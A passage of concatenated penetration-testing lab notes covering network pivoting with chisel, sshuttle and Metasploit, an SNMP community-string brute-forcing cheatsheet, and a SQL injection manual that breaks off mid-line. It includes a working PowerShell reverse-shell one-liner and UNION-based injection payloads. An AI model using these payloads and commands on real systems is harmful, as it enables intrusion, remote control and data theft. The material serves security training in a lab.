(yes/no/[fingerprint])? yes 147 | Warning: Permanently added '192.168.2.128' (RSA) to the list of known hosts. 148 | msfadmin@192.168.2.128's password: 149 | Traceback (most recent call last): 150 | File "", line 1, in 151 | File "assembler.py", line 27, in 152 | File "sshuttle.helpers", line 97 153 | except OSError as e: 154 | ^ 155 | SyntaxError: invalid syntax 156 | c : fatal: c : server died with error code 1 157 | ``` 158 | 159 | in my kali , sshuttle is giving me error 160 | but on ur box it works for sure 161 | 162 | **Limitations** : sshuttle will not work on windows boxes , may be in future it may work 163 | so its better to use sshuttle in linux only environment 164 | 165 | --- 166 | 167 | ## Chisel 168 | 169 | chisel is my favourite because it is cross platform and doesnot require any credentials 170 | 171 | chisel has two modes , **client** and **server** modes 172 | 173 | on our kali box we use server mode and goes on listening 174 | 175 | machine2 will connect to our chisel server using chisel binary and then will forward to other machines 176 | 177 | download chisel linux binary for our kali and corresponding chisel binary for victim machine 178 | 179 | ``` 180 | https://github.com/jpillora/chisel/releases 181 | ``` 182 | 183 | transfer it to machine2 which we have reverse shell access 184 | 185 | on our kali linux,run as reverse 186 | reverse option allow incoming client to open a port on our kali and connect to destination specified 187 | 188 | ``` 189 | chisel server -p 5555 --reverse 190 | ``` 191 | 192 | on our reverseshell machine1 193 | ``` 194 | ./chisel32 client 192.168.2.129:5555 R:1234:192.168.3.129:80 195 | ``` 196 | 197 | the above command connects to our kali and then 198 | R stands for remote host or our kali box 199 | and whatever data comes from our box 1234 port that will be redirected to 192.168.3.129 port 80 200 | so go to browser and open 127.0.0.1:1234 201 | you will see webpage of 192.168.3.129 202 | 203 | ``` 204 | $ ./chisel server -p 5555 --reverse 205 | 2021/05/30 23:06:57 server: Reverse tunnelling enabled 206 | 2021/05/30 23:06:57 server: Fingerprint ZHyDUORbA0i2GQhnaHza0PP3AX13BcDkehSnhlIM4is= 207 | 2021/05/30 23:06:57 server: Listening on http://0.0.0.0:5555 208 | 2021/05/30 23:07:42 server: session#1: tun: proxy#R:1234=>192.168.3.129:80: Listening 209 | ``` 210 | 211 | you can see connection 212 | 213 | kali:1234 -> machine1 -> machine2:80 214 | 215 | now this is like one:one port 216 | we can make machine1 act as socks 217 | 218 | on our kali box , like always 219 | ``` 220 | chisel server -p 5555 --reverse 221 | ``` 222 | 223 | on our machine1 224 | ``` 225 | ./chisel32 client 192.168.2.129:5555 R:1234:socks 226 | ``` 227 | 228 | now machine1 acts as socks 229 | we need to edit proxychains4.conf 230 | add this line 231 | ``` 232 | socks5 127.0.0.1 1234 233 | ``` 234 | 235 | now scan 192.168.3.129 with proxychains nmap 236 | ``` 237 | $ proxychains nmap -p80 -Pn -sV 192.168.3.129 238 | [proxychains] config file found: /etc/proxychains4.conf 239 | [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 240 | [proxychains] DLL init: proxychains-ng 4.14 241 | Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. 242 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 23:14 EDT 243 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 244 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 245 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 246 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 247 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 248 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 249 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 250 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 251 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 192.168.3.129:80 ... OK 252 | Nmap scan report for 192.168.3.129 253 | Host is up (0.0033s latency). 254 | 255 | PORT STATE SERVICE VERSION 256 | 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 257 | ``` 258 | now we can use any tool but put proxychains before the command 259 | 260 | now let's add another machine 261 | 262 | **machine3 - 192.168.4.128** 263 | 264 | only machine2 can ping machine3 265 | 266 | now we compromised machine1 and machine2 267 | we have reverse shell on machine2 268 | inorder to pivot through machine2 to machine3 269 | 270 | you need to setup a chisel server on machine1 and machine2 will connect to it and acts as socks 271 | 272 | let's do it to get more clarity 273 | 274 | on my kali 275 | ``` 276 | chisel server -p 5555 --reverse 277 | ``` 278 | 279 | on machine1 280 | 281 | ``` 282 | ./chisel32 client 192.168.2.129:5555 R:1234:socks 283 | ``` 284 | 285 | now grab another shell on machine1 in the way you got first shell 286 | 287 | now we need to run this chisel as server on machine1 288 | ``` 289 | ./chisel32 server -p 6666 --reverse 290 | ``` 291 | 292 | now on machine2 293 | ``` 294 | ./chisel32 client 192.168.3.128:6666 R:7777:socks 295 | ``` 296 | 297 | now this will redirect our traffic to 192.168.4.0/24 298 | 299 | we are almost done 300 | 301 | we just need to edit proxychains4.conf 302 | add these two lines 303 | ``` 304 | socks5 127.0.0.1 1234 305 | socks5 127.0.0.1 7777 306 | ``` 307 | 308 | run proxychains nmap scan 309 | ``` 310 | $ proxychains nmap -p80 -Pn -sV 192.168.4.128 311 | [proxychains] config file found: /etc/proxychains4.conf 312 | [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 313 | [proxychains] DLL init: proxychains-ng 4.14 314 | Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. 315 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 23:43 EDT 316 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK 317 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK 318 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK 319 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK 320 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK 321 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK 322 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK 323 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK 324 | [proxychains] Strict chain ... 127.0.0.1:1234 ... 127.0.0.1:7777 ... 192.168.4.128:80 ... OK 325 | Nmap scan report for 192.168.4.128 326 | Host is up (0.055s latency). 327 | 328 | PORT STATE SERVICE VERSION 329 | 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 330 | ``` 331 | 332 | you can see the chain from 1234 -> 7777 and then to .4 subnet 333 | 334 | kali:1234 -> machine1:7777 -> machine2 -> machine3:anyport 335 | 336 | if you have other machines you can repeat the same process 337 | now machine1,2,3 acts as socks 338 | 339 | --- 340 | 341 | ## Metasploit 342 | 343 | there is route command u can add route but 344 | metasploit have modules which add route to the subnet of compromised machine 345 | this autoroute is similar to route add command 346 | 347 | **autoroute** post module 348 | ``` 349 | post/multi/manage/autoroute 350 | ``` 351 | 352 | use that one 353 | set options 354 | ``` 355 | set SESSION 1 356 | set SUBNET 192.168.3.0 357 | run 358 | ``` 359 | 360 | ``` 361 | msf6 post(multi/manage/autoroute) > run 362 | 363 | [!] SESSION may not be compatible with this module. 364 | [*] Running module against metasploitable.localdomain 365 | [*] Searching for subnets to autoroute. 366 | [+] Route added to subnet 192.168.3.0/255.255.255.0 from host's routing table. 367 | [+] Route added to subnet 192.168.2.0/255.255.255.0 from host's routing table. 368 | 369 | ``` 370 | 371 | now use any module to scan 192.168.3.129 372 | 373 | ``` 374 | auxiliary/scanner/portscan/tcp 375 | ``` 376 | 377 | ``` 378 | msf6 auxiliary(scanner/portscan/tcp) > run 379 | 380 | [+] 192.168.3.129: - 192.168.3.129:23 - TCP OPEN 381 | [+] 192.168.3.129: - 192.168.3.129:22 - TCP OPEN 382 | [+] 192.168.3.129: - 192.168.3.129:21 - TCP OPEN 383 | [+] 192.168.3.129: - 192.168.3.129:25 - TCP OPEN 384 | [+] 192.168.3.129: - 192.168.3.129:53 - TCP OPEN 385 | [+] 192.168.3.129: - 192.168.3.129:80 - TCP OPEN 386 | [+] 192.168.3.129: - 192.168.3.129:111 - TCP OPEN 387 | [+] 192.168.3.129: - 192.168.3.129:139 - TCP OPEN 388 | [+] 192.168.3.129: - 192.168.3.129:445 - TCP OPEN 389 | [+] 192.168.3.129: - 192.168.3.129:513 - TCP OPEN 390 | [+] 192.168.3.129: - 192.168.3.129:514 - TCP OPEN 391 | [+] 192.168.3.129: - 192.168.3.129:512 - TCP OPEN 392 | [*] 192.168.3.129: - Scanned 1 of 1 hosts (100% complete) 393 | [*] Auxiliary module execution completed 394 | ``` 395 | we can see the open ports 396 | 397 | **meterpreter portfwd** 398 | 399 | in meterpreter session we can use portfwd command to forward to destination 400 | ``` 401 | meterpreter > portfwd -h 402 | Usage: portfwd [-h] [add | delete | list | flush] [args] 403 | 404 | 405 | OPTIONS: 406 | 407 | -L Forward: local host to listen on (optional). Reverse: local host to connect to. 408 | -R Indicates a reverse port forward. 409 | -h Help banner. 410 | -i Index of the port forward entry to interact with (see the "list" command). 411 | -l Forward: local port to listen on. Reverse: local port to connect to. 412 | -p Forward: remote port to connect to. Reverse: remote port to listen on. 413 | -r Forward: remote host to connect to. 414 | ``` 415 | 416 | now lets forward to 192.168.3.129 417 | 418 | ``` 419 | meterpreter > portfwd add -l 4444 -p 80 -r 192.168.3.129 420 | [*] Local TCP relay created: :4444 <-> 192.168.3.129:80 421 | ``` 422 | 423 | now go to browser and open 127.0.0.1:4444 424 | you can see webpage of 192.168.3.129 425 | 426 | now its like one:one port 427 | 428 | lets use socks module in metasploit 429 | make sure route is added else this will not work 430 | 431 | ``` 432 | use auxiliary/server/socks_proxy 433 | ``` 434 | 435 | now you can change SRVPORT 436 | ``` 437 | run 438 | ``` 439 | now socks server is up 440 | 441 | edit /etc/proxychains4.conf 442 | ``` 443 | socks5 127.0.0.1 1080 444 | ``` 445 | now do proxychains nmap scan 446 | 447 | ``` 448 | $ proxychains nmap -p80 -Pn -sV 192.168.3.129 449 | [proxychains] config file found: /etc/proxychains4.conf 450 | [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 451 | [proxychains] DLL init: proxychains-ng 4.14 452 | Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. 453 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 00:38 EDT 454 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 455 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 456 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 457 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 458 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 459 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 460 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 461 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 462 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 463 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 464 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 465 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 466 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 467 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 468 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 469 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 470 | [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.3.129:80 ... OK 471 | Nmap scan report for 192.168.3.129 472 | Host is up (0.0099s latency). 473 | 474 | PORT STATE SERVICE VERSION 475 | 80/tcp open http Apache httpd 2.2.8 (DAV/2) 476 | ``` 477 | 478 | 479 | -------------------------------------------------------------------------------- /Reverse Shells.md: -------------------------------------------------------------------------------- 1 | # Reverse Shells 2 | 3 | Powershell mini 4 | 5 | ``` 6 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.17.29',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 7 | 8 | ``` -------------------------------------------------------------------------------- /SNMP Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # SNMP Cheatsheet 2 | 3 | Tags : #snmp #strings #nse #snmp-info #snmp-brute 4 | #snmpwalk #snmpget #snmpset #snmptranslate #snmp_enum #snmp_login #hydra #medusa 5 | 6 | ## Basics 7 | if you dont know snmp , no problem 8 | here are resources to learn about snmp and terminology 9 | ``` 10 | https://www.networkmanagementsoftware.com/snmp-tutorial/ 11 | 12 | https://www.networkmanagementsoftware.com/snmp-tutorial-part-2-rounding-out-the-basics/ 13 | ``` 14 | 15 | --- 16 | 17 | ## Lab Setup 18 | 19 | Kali linux - 192.168.0.101 20 | Vyatta - 192.168.0.110 21 | 22 | --- 23 | 24 | ## Nmap Scan 25 | udp scan 26 | ``` 27 | $ sudo nmap -sU -Pn -p161,162 192.168.0.110 28 | [sudo] password for kali: 29 | Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. 30 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 23:53 EDT 31 | Nmap scan report for 192.168.0.110 32 | Host is up (0.00040s latency). 33 | 34 | PORT STATE SERVICE 35 | 161/udp open|filtered snmp 36 | 162/udp closed snmptrap 37 | MAC Address: 00:0C:29:A9:41:81 (VMware) 38 | ``` 39 | 40 | default script scan 41 | 42 | ``` 43 | $ sudo nmap -p161 -sC -sU -Pn 192.168.0.110 44 | Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. 45 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 23:54 EDT 46 | Nmap scan report for 192.168.0.110 47 | Host is up (0.00039s latency). 48 | 49 | PORT STATE SERVICE 50 | 161/udp open|filtered snmp 51 | | snmp-info: 52 | | enterprise: net-snmp 53 | | engineIDFormat: unknown 54 | | engineIDData: 72b2d3418298b260 55 | | snmpEngineBoots: 3 56 | |_ snmpEngineTime: 43m38s 57 | MAC Address: 00:0C:29:A9:41:81 (VMware) 58 | ``` 59 | 60 | default scripts try for `public` and `private` as community strings . if these are wrong we dont get much information 61 | in our case these are not default strings 62 | administrator have changed 63 | 64 | lets use snmp-brute 65 | this takes lot of time , we can use other tools 66 | but we give try 67 | 68 | syntax is 69 | ``` 70 | --- 71 | -- @usage 72 | -- nmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ] 73 | -- 74 | -- @args snmp-brute.communitiesdb The filename of a list of community strings to try. 75 | ``` 76 | 77 | we need to specify wordlist file at that argument 78 | ``` 79 | $ sudo nmap -Pn -p161 -sU --script=snmp-brute --script-args=snmp-brute.communitiesdb=/home/kali/tools/wordlists/rockyou.txt 192.168.0.110 80 | ``` 81 | 82 | it takes time 83 | lets use another tools 84 | 85 | --- 86 | 87 | ## Onesixtyone 88 | syntax is simple 89 | ``` 90 | $ onesixtyone -c wordlist ipaddress 91 | ``` 92 | 93 | ``` 94 | $ onesixtyone -c /home/kali/tools/wordlists/rockyou.txt 192.168.0.110 95 | ``` 96 | 97 | --- 98 | 99 | ## Hydra 100 | 101 | to check syntax of any protocol 102 | ``` 103 | hydra -U protocolname 104 | 105 | hydra -U snmp 106 | 107 | hydra -U ssh 108 | ``` 109 | 110 | now bruteforcing on 192.168.0.110 111 | ``` 112 | $ hydra -P /home/kali/tools/wordlists/rockyou.txt -m 1 192.168.0.110 snmp 113 | 114 | -m stands for snmp version 1,2,3 115 | ``` 116 | 117 | --- 118 | 119 | ## Medusa 120 | 121 | we can use medusa tool to bruteforce for snmp community strings 122 | 123 | ``` 124 | $ medusa -u user -P /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt -M snmp -h 192.168.0.110 125 | ``` 126 | 127 | we get the output 128 | ``` 129 | ACCOUNT CHECK: [snmp] Host: 192.168.0.110 (1 of 1, 0 complete) User: (null) (0 of 1, 1 complete) Password: test (1 of 0 complete) 130 | ACCOUNT FOUND: [snmp] Host: 192.168.0.110 User: (null) Password: test [SUCCESS] 131 | ACCOUNT CHECK: [snmp] Host: 192.168.0.110 (1 of 1, 0 complete) User: (null) (0 of 1, 2 complete) Password: test2 (2 of 0 complete) 132 | ACCOUNT FOUND: [snmp] Host: 192.168.0.110 User: (null) Password: test2 [SUCCESS] 133 | ``` 134 | we got two strings like from metasploit module output 135 | 136 | --- 137 | 138 | ## snmpcheck 139 | 140 | after getting a community string we can check with 141 | `snmpcheck` tool 142 | 143 | ``` 144 | snmpcheck -c string ipaddress 145 | ``` 146 | 147 | --- 148 | 149 | ## snmpwalk 150 | 151 | if we got any read-only or read-write string we can dump whole data using `snmpwalk` 152 | 153 | ``` 154 | $ snmpwalk -v1 -c test 192.168.0.110 | head -n 10 155 | iso.3.6.1.2.1.1.1.0 = STRING: "Vyatta VC6.5R1" 156 | iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.30803 157 | iso.3.6.1.2.1.1.3.0 = Timeticks: (515600) 1:25:56.00 158 | iso.3.6.1.2.1.1.4.0 = STRING: "root" 159 | iso.3.6.1.2.1.1.5.0 = STRING: "vyatta" 160 | iso.3.6.1.2.1.1.6.0 = STRING: "Unknown" 161 | iso.3.6.1.2.1.1.7.0 = INTEGER: 14 162 | iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00 163 | iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.2.3.1.1 164 | iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1 165 | ``` 166 | 167 | repace 1 with 2 or 3 for snmpv2,v3 168 | -c for specifying community string 169 | 170 | --- 171 | 172 | ## snmpset 173 | ``` 174 | TYPE: one of i, u, t, a, o, s, x, d, b 175 | i: INTEGER, u: unsigned INTEGER, t: TIMETICKS, a: IPADDRESS 176 | o: OBJID, s: STRING, x: HEX STRING, d: DECIMAL STRING, b: BITS 177 | U: unsigned int64, I: signed int64, F: float, D: double 178 | ``` 179 | 180 | if we got rw string we can modify OIDs 181 | ``` 182 | $ snmpset -v1 -c test2 192.168.0.110 iso.3.6.1.2.1.1.6.0 s hackedmaboi 183 | ``` 184 | 185 | u can verify with **snmpwalk** command 186 | ``` 187 | $ snmpwalk -v1 -c test 192.168.0.110 | head -n 10 188 | iso.3.6.1.2.1.1.1.0 = STRING: "Vyatta VC6.5R1" 189 | iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.30803 190 | iso.3.6.1.2.1.1.3.0 = Timeticks: (592391) 1:38:43.91 191 | iso.3.6.1.2.1.1.4.0 = STRING: "root" 192 | iso.3.6.1.2.1.1.5.0 = STRING: "vyatta" 193 | iso.3.6.1.2.1.1.6.0 = STRING: "hacked" 194 | iso.3.6.1.2.1.1.7.0 = INTEGER: 14 195 | iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00 196 | iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.2.3.1.1 197 | iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1 198 | ``` 199 | 200 | --- 201 | 202 | ## snmpget 203 | 204 | if u want to get specific OID value u can get it via **snmpget** 205 | 206 | ``` 207 | $ snmpget -v1 -c test2 192.168.0.110 iso.3.6.1.2.1.1.6.0 208 | 209 | iso.3.6.1.2.1.1.6.0 = STRING: "hacked" 210 | 211 | ``` 212 | 213 | --- 214 | 215 | ## Metasploit 216 | ``` 217 | search snmp 218 | ``` 219 | gives lot of modules 220 | 221 | lets bruteforce for snmp community strings 222 | try **snmp_login** 223 | now set options 224 | you can leave the default pass file as it is or u can mention rockyou.txt 225 | after setting all the options , 226 | now **run barry run** 227 | ``` 228 | setg RHOSTS 192.168.0.110 229 | set STOP_ON_SUCCESS true 230 | run 231 | ``` 232 | 233 | ``` 234 | msf6 auxiliary(scanner/snmp/snmp_login) > run 235 | 236 | [!] No active DB -- Credential data will not be saved! 237 | [+] 192.168.0.110:161 - Login Successful: test2 (Access level: read-write); Proof (sysDescr.0): Vyatta VC6.5R1 238 | [+] 192.168.0.110:161 - Login Successful: test (Access level: read-only); Proof (sysDescr.0): Vyatta VC6.5R1 239 | [*] Scanned 1 of 1 hosts (100% complete) 240 | [*] Auxiliary module execution completed 241 | ``` 242 | 243 | we got two strings 244 | ``` 245 | test - read-only access 246 | test2 - read-write access 247 | ``` 248 | 249 | lets try for **snmp_enum** 250 | this is post exploitation module 251 | u need to know community string for this 252 | set options 253 | ``` 254 | setg RHOSTS 192.168.0.110 255 | set COMMUNITY test 256 | run 257 | ``` 258 | now run the module 259 | you will get the all information about host 260 | 261 | metasploit also have snmp_set to change the OID values 262 | ``` 263 | set COMMUNITY test2 264 | set OID oid 265 | set OIDVALUE hackedagain 266 | run 267 | ``` 268 | 269 | we get error because **iso** is not recognised by metasploit 270 | ``` 271 | msf6 auxiliary(scanner/snmp/snmp_set) > set OID iso.3.6.1.2.1.1.6.0 272 | OID => iso.3.6.1.2.1.1.6.0 273 | msf6 auxiliary(scanner/snmp/snmp_set) > set OIDVALUE hacked2 274 | OIDVALUE => hacked2 275 | msf6 auxiliary(scanner/snmp/snmp_set) > run 276 | 277 | [*] Try to connect to 192.168.0.110... 278 | [-] 192.168.0.110 Error: ArgumentError ["iso", "3", "6", "1", "2", "1", "1", "6", "0"]:Array not a valid object ID ["/usr/share/metasploit-framework/lib/snmp/varbind.rb:161:in `rescue in initialize'", "/usr/share/metasploit-framework/lib/snmp/varbind.rb:152:in `initialize'", "/usr/share/metasploit-framework/lib/snmp/mib.rb:243:in `new'", "/usr/share/metasploit-framework/lib/snmp/mib.rb:243:in `parse_oid'", "/usr/share/metasploit-framework/lib/snmp/mib.rb:218:in `oid'", "/usr/share/metasploit-framework/lib/snmp/mib.rb:167:in `varbind_list'", "/usr/share/metasploit-framework/lib/snmp/manager.rb:239:in `get'", "/usr/share/metasploit-framework/lib/snmp/manager.rb:262:in `get_value'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/snmp/snmp_set.rb:48:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:120:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"] 279 | [*] Scanned 1 of 1 hosts (100% complete) 280 | [*] Auxiliary module execution completed 281 | 282 | ``` 283 | we need to translate that OID 284 | we can use tool called **snmptranslate** 285 | ``` 286 | $ snmptranslate -On iso.3.6.1.2.1.1.6.0 287 | .1.3.6.1.2.1.1.6.0 288 | ``` 289 | -On stands for output numerically 290 | 291 | now we can place that 292 | ``` 293 | msf6 auxiliary(scanner/snmp/snmp_set) > set OID 1.3.6.1.2.1.1.6.0 294 | OID => 1.3.6.1.2.1.1.6.0 295 | msf6 auxiliary(scanner/snmp/snmp_set) > run 296 | 297 | ``` 298 | 299 | ``` 300 | msf6 auxiliary(scanner/snmp/snmp_set) > run 301 | 302 | [*] Try to connect to 192.168.0.110... 303 | [*] Check initial value : OID 1.3.6.1.2.1.1.6.0 => hacked 304 | [*] Set new value : OID 1.3.6.1.2.1.1.6.0 => hacked2 305 | [*] Check new value : OID 1.3.6.1.2.1.1.6.0 => hacked2 306 | [*] Scanned 1 of 1 hosts (100% complete) 307 | [*] Auxiliary module execution completed 308 | ``` 309 | 310 | --- -------------------------------------------------------------------------------- /SQL injection Manual.md: -------------------------------------------------------------------------------- 1 | # SQL injection Manual 2 | 3 | Tags : #sqli #sqlinjection #sql #blindsqli #pysqli #sqli_cheatsheet 4 | 5 | ## Info 6 | SQL Comments : double hiphen and space -- - 7 | hashtag # 8 | 9 | --- 10 | 11 | Determine all the urls with parameters in it 12 | Example : 13 | ``` 14 | https://www.example.com/products?id=2 15 | https://www.example.com/products?category=Computers 16 | https://www.example.com/products?id=2&username=tech69 17 | ``` 18 | Now try to put single quote ' or double quote " and see any errors in the response 19 | 20 | if we got any errors that means that parameter is vulnerable to sql injection 21 | 22 | ---- 23 | 24 | ## OR and AND Injection 25 | 26 | ok , now we determined our injection point (parameter) 27 | let's use OR and AND clauses to make TRUE and FALSE result 28 | ``` 29 | https://www.example.com/products?id=2' OR 1=1 -- - 30 | https://www.example.com/products?id=2' AND 1=2 -- - 31 | https://www.example.com/products?id=2' OR 1=1 # 32 | https://www.example.com/products?id=2' AND 1=2 # 33 | ``` 34 | 35 | We can try for bypassing login page . Most time will not work but worths a try . 36 | 37 | --- 38 | 39 | ## Determining number of columns using ORDER BY 40 | 41 | We can sort the results in the resposne using **ORDER BY** keyword 42 | This will sort according to the column name or number 43 | Suppose there are 3 columns and if we sort according to 4th column we get error because there is no 4th column 44 | 45 | Sorting according to first column 46 | ``` 47 | https://www.example.com/products?id=2' ORDER BY 1 -- - 48 | ``` 49 | 50 | Sorting according to second column 51 | ``` 52 | https://www.example.com/products?id=2' ORDER BY 2-- - 53 | ``` 54 | 55 | If we got 500 server error that means there is only one column 56 | ``` 57 | https://www.example.com/products?id=2' ORDER BY 3 -- - 58 | https://www.example.com/products?id=2' ORDER BY 4 -- - 59 | 60 | 61 | ``` 62 | 63 | --- 64 | 65 | ## UNION Based Injection 66 | 67 | We can try Union clause and use another SELECT statement and get information 68 | 69 | **UNION will combine only results of SELECT statements .** 70 | 71 | ## Determining number of columns using UNION and SELECT 72 | 73 | We can determine number of columns the backend sql query is returning using UNION also . 74 | First we select one NULL and if its got error that means there is column mismatch between backend query and our select query . 75 | Then we increase NULL and we continue 76 | whenever we get 200 response that means our number of NULL's are equal to the number of columns backend query is returning 77 | 78 | ``` 79 | https://www.example.com/products?id=2' UNION SELECT NULL -- - 80 | https://www.example.com/products?id=2' UNION SELECT NULL,NULL from dual -- - 81 | https://www.example.com/products?id=2' UNION SELECT NULL,NULL,NULL -- - 82 | and so on ... 83 | ``` 84 | 85 | --- 86 | 87 | ## Determining VARCHAR column using UNION and SELECT 88 | 89 | Now , we got number of columns backend query is returning . 90 | we need to determine which column returns string type . 91 | instead of NULL we put a string and test each column 92 | 93 | Suppose we found that there are 4 columns 94 | ``` 95 | https://www.example.com/products?id=2' UNION SELECT 'a',NULL,NULL,NULL -- - 96 | https://www.example.com/products?id=2' UNION SELECT NULL,'a',NULL,NULL from dual -- - 97 | https://www.example.com/products?id=2' UNION SELECT NULL,NULL,'a',NULL -- - 98 | https://www.example.com/products?id=2' UNION SELECT NULL,NULL,NULL,'a' -- - 99 | ``` 100 | if any one got 200 response that means that respective column is string type 101 | 102 | --- 103 | 104 | ## Getting Information from string column 105 | 106 | We determined say 2nd column is string type 107 | we can get sql version and other information 108 | 109 | ### Default Tables in Different Database types 110 | ``` 111 | Oracle - dual , v$version ,all_tables , all_tab_columns 112 | MySQL,PostgreSQL - information_schema.tables,information_schema.columns 113 | SQLite - sqlite_master 114 | ``` 115 | 116 | ``` 117 | mysql> show variables like "%version%" 118 | -> ; 119 | +-------------------------+-------------------------+ 120 | | Variable_name | Value | 121 | +-------------------------+-------------------------+ 122 | | innodb_version | 5.7.34 | 123 | | protocol_version | 10 | 124 | | slave_type_conversions | | 125 | | tls_version | TLSv1,TLSv1.1,TLSv1.2 | 126 | | version | 5.7.34-0ubuntu0.18.04.1 | 127 | | version_comment | (Ubuntu) | 128 | | version_compile_machine | x86_64 | 129 | | version_compile_os | Linux | 130 | +-------------------------+-------------------------+ 131 | 8 rows in set (0.04 sec) 132 | 133 | ``` 134 | 135 | Getting information from string type column 136 | ``` 137 | https://www.example.com/products?id=2' UNION SELECT NULL,@@version,NULL -- - 138 | https://www.example.com/products?id=2' UNION SELECT NULL,version(),NULL -- - 139 | https://www.example.com/products?id=2' UNION SELECT NULL,BANNER,NULL from v$version -- - 140 | https://www.example.com/products?id=2' UNION SELECT NULL,@@version_compile_machine,NULL -- - 141 | ``` 142 | 143 | --- 144 | 145 | ## Dumping all Tables and data 146 | 147 | **ORACLE** 148 | ``` 149 | https://www.example.com/products?id=2' UNION SELECT NULL,TABLE_NAME,NULL from all_tables -- - 150 | https://www.example.com/products?id=2' UNION SELECT NULL,COLUMN_NAME,NULL from all_tab_columns where table_name = 'users' 151 | ``` 152 | 153 | **MySQL,MSSQL,PostgreSQL** 154 | ``` 155 | https://www.example.com/products?id=2' UNION SELECT NULL,TABLE_NAME,NULL from information_schema.tables -- - 156 | https://www.example.com/products?id=2' UNION SELECT NULL,COLUMN_NAME,NULL from information_schema.columns where table_name = 'users' -- - 157 | ``` 158 | 159 | Dumping data from columns 160 | ``` 161 | https://www.example.com/products?id=2' 